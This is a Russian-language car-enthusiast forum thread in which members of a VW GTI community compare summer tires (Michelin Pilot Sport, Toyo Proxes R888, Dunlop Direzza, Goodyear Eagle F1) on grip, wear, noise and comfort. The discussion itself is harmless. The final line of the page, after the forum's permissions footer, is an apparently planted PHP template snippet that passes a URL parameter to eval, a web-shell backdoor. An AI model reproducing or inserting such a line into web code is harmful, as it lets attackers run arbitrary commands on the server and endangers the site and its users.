+ Ответить в теме
Страница 1 из 4 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 35

Тема: Летние Шины 225/40 R8?


  1. #1
    GTI-Racing constantinus is on a distinguished road Аватар для constantinus
    Регистрация
    22.09.2007
    Откуда
    Киев
    Машина
    RGTI
    Сообщений
    1,631
    в прочем возник вопрос какие?
    Если не трудно поделитесь своими субъективными предпочтениями и если есть ссылки на тесты авторитетных изданий то тоже будут очень кстати)

    Свои предпочтения - с направленным рисунком по типу
    Michelin Pilot Sport

    Toyo Proxes R888

    Toyo Proxes T1-R

    Goodyear Eagle F1 GS-D3

    Dunlop Direzza Sport Z1 Star Spec


    Передвигаюсь в подавляющем большинстве в городе, чисто визуально больше нравится Toyo Proxes R888.
    Почему-то более практичным кажется Proxes T1-R. Только вот про Toyo мало, что слышал. Только во всяких тюннинг передачах о них.

    В принципе на лето стоят Dunlop которые шли при покупке - как по мне то неубиваемая - нет шишок хоть и влетал в ямы и не раз. По мере изнашивания появилось ощущение скольжения, а так претензий нет.
    Зимние NOKIAN - они новички в летнем сегменте, да и если честно не сильно доволен - не очень цепкие да и на виражах авто как-то странно ведет себя - типа раскачивается.

    Основные кретерии: управляемость и комфорт)

  2. #2
    я бы взял Mischelin, считаю их одними из лучших по лету!

    О тойо не сильно знаю...

    был у меня Eagle F1, стираеться за сезон... у меня ушло 15т км что бы елочка осталась только по центру :P
    The day I've bought my GTI was the day I became alive. ©
    GTI не стареют, со временем они становятся быстрее, и ниже. ©

  3. #3
    GTI-Racing Serzh will become famous soon enough Serzh will become famous soon enough Аватар для Serzh
    Регистрация
    21.01.2008
    Откуда
    Киев
    Машина
    A4 Allroad
    Сообщений
    1,211
    R888 хорошие, но ведь полуслик тебе не нужен.
    MKV GTI APR Stage 2 - продан ((
    AUDI A4 allroad
    МB E280 4 MATIC - продан

  4. #4
    GTI-Racing constantinus is on a distinguished road Аватар для constantinus
    Регистрация
    22.09.2007
    Откуда
    Киев
    Машина
    RGTI
    Сообщений
    1,631
    про R888 пишут, что супер в мокрую погоду, бока очень крепки и мягкая, но не дай бог в грязь попасть или на лед то все.

  5. #5
    GTI-Racing total is on a distinguished road Аватар для total
    Регистрация
    05.12.2006
    Машина
    MkV GTI
    Сообщений
    1,146
    откатиал на PS2 прошлый сезов, даж не убил :-)) доволен как слон [img]style_emoticons/<#EMO_DIR#>/tongue.gif[/img]
    Time attack
    Mkv gti
    ADM - 1.58,4
    Лидер - 1.02,5
    DC2
    ADM - 1.58,2
    Лидер - 1.01,2
    Smolenskring - 1.48,2
    NNRing - 1.53,8
    Kazanring - 1.43.863

  6. #6
    <div class='quotetop'>Цитата(total &#064; Feb 14 2009, 09&#58;52) <{POST_SNAPBACK}></div><div class='quotemain'>откатиал на PS2 прошлый сезов, даж не убил :-)) доволен как слон :P[/b][/quote]солидарен..

    а если валить собираешься жестко то ставь Pilot Sport Cup но там не рекомендуется в дождь ездить ;)
    The day I've bought my GTI was the day I became alive. ©
    GTI не стареют, со временем они становятся быстрее, и ниже. ©

  7. #7
    GTI-Racing Maxus will become famous soon enough Maxus will become famous soon enough Аватар для Maxus
    Регистрация
    08.08.2008
    Откуда
    Moscow
    Машина
    Scirocco & Golf
    Сообщений
    228
    Тоже себе выбираю резину на лето, и как раз думаю о Toyo Proxes R888 либо Dunlop Direzza Sport Z1 Star Spec.
    Проездив сезон на полусликах с подобным рисунком и из минусов могу выделить, что резина очень шумная, жесткая, не практичная тем, что у нее идет разделение на левую и правую сторону и еще она быстро стерается. Но когда я начинаю дубасить мне пофиг на все недостатки, держит просто супер.
    В дождь она абсолютно нормально, и еще все полуслики шире обчной резины с такими параметрами.
    http://www.stuckey.com.au/tyres_deta...?TyreName=R888

    Про этот данлоп ничего не знаю, но многие говорят, что он лучше адван неовы и стоит относительно не дорого, но его в Россию официально не завозят, а если что случится то быстро ее фиг найдешь, а toyo привозять официально ее купить проще.

  8. #8
    GTI-Racing total is on a distinguished road Аватар для total
    Регистрация
    05.12.2006
    Машина
    MkV GTI
    Сообщений
    1,146
    Еще учтите что рекомендуется хранить такие шины (типа 888) в теплом помещении.
    Time attack
    Mkv gti
    ADM - 1.58,4
    Лидер - 1.02,5
    DC2
    ADM - 1.58,2
    Лидер - 1.01,2
    Smolenskring - 1.48,2
    NNRing - 1.53,8
    Kazanring - 1.43.863

  9. #9
    <div class='quotetop'>Цитата(maxus &#064; Feb 14 2009, 10&#58;47) <{POST_SNAPBACK}></div><div class='quotemain'>Тоже себе выбираю резину на лето, и как раз думаю о Toyo Proxes R888 либо Dunlop Direzza Sport Z1 Star Spec.
    Проездив сезон на полусликах с подобным рисунком и из минусов могу выделить, что резина очень шумная, жесткая, не практичная тем, что у нее идет разделение на левую и правую сторону и еще она быстро стерается. Но когда я начинаю дубасить мне пофиг на все недостатки, держит просто супер.
    В дождь она абсолютно нормально, и еще все полуслики шире обчной резины с такими параметрами.
    http://www.stuckey.com.au/tyres_deta...?TyreName=R888

    Про этот данлоп ничего не знаю, но многие говорят, что он лучше адван неовы и стоит относительно не дорого, но его в Россию официально не завозят, а если что случится то быстро ее фиг найдешь, а toyo привозять официально ее купить проще.[/b][/quote]
    Макс, чтото ты про дереззу хрень написал -еще как она завозится в Рашку, Зверь на ней катался, еще друзья катались... говорят что хорошая резина, тока стачивается бычтро... а вообще дирезза это лучшее что изобрел данлоп для полуспорта

  10. #10
    GTI-Racing Serzh will become famous soon enough Serzh will become famous soon enough Аватар для Serzh
    Регистрация
    21.01.2008
    Откуда
    Киев
    Машина
    A4 Allroad
    Сообщений
    1,211
    <div class='quotetop'>Цитата(constantinus &#064; Feb 14 2009, 05&#58;13) <{POST_SNAPBACK}></div><div class='quotemain'>про R888 пишут, что супер в мокрую погоду, бока очень крепки и мягкая, но не дай бог в грязь попасть или на лед то все.[/b][/quote]

    Мы ведь о летней резине говорим ??)))
    MKV GTI APR Stage 2 - продан ((
    AUDI A4 allroad
    МB E280 4 MATIC - продан

+ Ответить в теме
Страница 1 из 4 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. Летние Шины 235/45 R17
    от Horn в разделе Шины, диски
    Ответов: 17
    Последнее сообщение: 10.04.2024, 21:43
  2. КУплю летние шины
    от inVENTOr в разделе Шины, диски
    Ответов: 32
    Последнее сообщение: 02.04.2024, 05:02
  3. Недорогие летние шины
    от Гольфстрим в разделе Шины, диски
    Ответов: 14
    Последнее сообщение: 01.04.2024, 21:42
  4. Продам Летние шины 225/45 R17
    от Temagvozd в разделе Шины/диски
    Ответов: 4
    Последнее сообщение: 03.01.2024, 12:59
  5. КУплю летние шины 225/40
    от inVENTOr в разделе Шины/диски
    Ответов: 7
    Последнее сообщение: 02.01.2024, 19:29

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}